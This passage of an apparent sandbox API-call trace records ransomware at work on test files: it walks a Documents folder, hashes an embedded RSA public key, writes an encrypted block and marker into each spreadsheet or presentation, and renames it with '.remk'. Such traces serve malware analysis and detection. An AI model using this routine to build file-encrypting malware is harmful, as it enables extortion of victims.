lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.229] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=26291) returned 1 [0235.229] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.232] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x668d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.232] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.234] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x66b3, lpOverlapped=0x0) returned 1 [0235.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.235] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.236] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.236] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.236] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.236] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.236] GetLastError () returned 0x0 [0235.236] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.236] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.236] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.236] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.237] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.237] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.237] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x66b3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.238] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.238] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.238] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.238] CloseHandle (hObject=0x640) returned 1 [0235.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x325d3b0 [0235.239] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\RDDJdUb3KAo.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\rddjdub3kao.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\RDDJdUb3KAo.xls.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\rddjdub3kao.xls.remk")) returned 1 [0235.241] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83f8f5d0, ftCreationTime.dwHighDateTime=0x1d5e5ff, ftLastAccessTime.dwLowDateTime=0x23675a60, ftLastAccessTime.dwHighDateTime=0x1d5d973, ftLastWriteTime.dwLowDateTime=0x23675a60, ftLastWriteTime.dwHighDateTime=0x1d5d973, nFileSizeHigh=0x0, nFileSizeLow=0x1830e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rDvHm1Gu.xlsx", cAlternateFileName="RDVHM1~1.XLS")) returned 1 [0235.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e8f8 [0235.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0235.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\rDvHm1Gu.xlsx") returned=".xlsx" [0235.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\rDvHm1Gu.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\rdvhm1gu.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.242] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=99086) returned 1 [0235.242] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.244] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x182e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.244] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.247] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1830e, lpOverlapped=0x0) returned 1 [0235.248] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.249] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.250] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.250] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.250] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.250] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.250] GetLastError () returned 0x0 [0235.250] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.250] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.250] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.250] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.250] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.251] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.252] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1830e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.252] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.252] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.252] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.252] CloseHandle (hObject=0x640) returned 1 [0235.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x325d3b0 [0235.255] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\rDvHm1Gu.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\rdvhm1gu.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\rDvHm1Gu.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\rdvhm1gu.xlsx.remk")) returned 1 [0235.257] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6293df10, ftCreationTime.dwHighDateTime=0x1d5dff4, ftLastAccessTime.dwLowDateTime=0xe978010, ftLastAccessTime.dwHighDateTime=0x1d5e774, ftLastWriteTime.dwLowDateTime=0xe978010, ftLastWriteTime.dwHighDateTime=0x1d5e774, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t648 Z2T0mST-97jBqS", cAlternateFileName="T648Z2~1")) returned 1 [0235.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0235.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c79a0 [0235.257] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x264e95b0, ftCreationTime.dwHighDateTime=0x1d5e290, ftLastAccessTime.dwLowDateTime=0x5d462a90, ftLastAccessTime.dwHighDateTime=0x1d5da86, ftLastWriteTime.dwLowDateTime=0x5d462a90, ftLastWriteTime.dwHighDateTime=0x1d5da86, nFileSizeHigh=0x0, nFileSizeLow=0x2e7b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tK5rfTr5kIZSRi.pptx", cAlternateFileName="TK5RFT~1.PPT")) returned 1 [0235.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e8f8 [0235.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0235.257] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\tK5rfTr5kIZSRi.pptx") returned=".pptx" [0235.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\tK5rfTr5kIZSRi.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\tk5rftr5kizsri.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.259] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=11899) returned 1 [0235.259] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.262] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x2e55, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.262] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.264] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x2e7b, lpOverlapped=0x0) returned 1 [0235.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.264] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.266] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.266] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.266] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.266] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.266] GetLastError () returned 0x0 [0235.266] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.266] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.266] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.266] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.266] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2e80) returned 0x37c6278 [0235.267] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cad0 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea18 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cb18 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea30 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea60 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeac0 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea78 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.267] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea60 | out: hHeap=0x630000) returned 1 [0235.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea78 | out: hHeap=0x630000) returned 1 [0235.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeac0 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eea78 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31eea60 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.268] RtlAllocateHeap 